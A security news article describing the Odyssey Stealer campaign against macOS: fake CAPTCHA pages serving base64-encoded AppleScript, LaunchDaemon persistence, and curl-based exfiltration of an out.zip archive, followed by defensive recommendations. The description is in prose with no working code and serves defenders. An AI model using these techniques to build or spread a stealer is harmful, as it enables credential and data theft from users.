New Wave of Odyssey Stealer Targets macOS Users in Active Cyberattack Campaign

The resurgence of macOS‑targeted malware reflects a strategic shift among cybercriminals who once considered Apple’s ecosystem relatively secure. Odyssey Stealer, a rebranded offshoot of the Poseidon and AMOS stealers, illustrates how threat actors are repurposing existing codebases to exploit new operating systems. By leveraging the familiarity of legitimate download sites and embedding malicious logic behind counterfeit CAPTCHA challenges, the group bypasses traditional web filters and capitalizes on user trust. This evolution underscores the importance of threat intelligence that tracks code reuse and attribution patterns across platforms.

Odyssey’s distribution chain is a textbook example of layered social engineering. Victims encounter a fake verification page that detects the operating system before presenting a command‑line snippet. The snippet, encoded in base64, decodes to an AppleScript that installs the stealer without dropping a conventional binary, thereby reducing its footprint on disk. Persistence is reinforced through randomly generated LaunchDaemon plist files, ensuring the payload survives system restarts. The malware’s exfiltration routine compresses stolen data into an out.zip archive and repeatedly attempts curl POST uploads, adapting to temporary network blocks. Such techniques complicate forensic analysis and demand advanced endpoint monitoring that can flag anomalous script execution and network traffic.

For organizations, the rise of Odyssey signals a need to broaden security controls beyond Windows‑centric solutions. Endpoint detection and response (EDR) tools must be calibrated to monitor macOS-specific artifacts like LaunchDaemons, AppleScript activity, and unusual base64 command usage. User education campaigns should emphasize the risks of executing terminal commands from unverified sources, especially when prompted by seemingly innocuous CAPTCHA dialogs. As threat actors continue to refine cross‑platform stealers, a proactive blend of threat hunting, threat‑intel sharing, and hardened macOS configurations will be essential to mitigate the growing attack surface.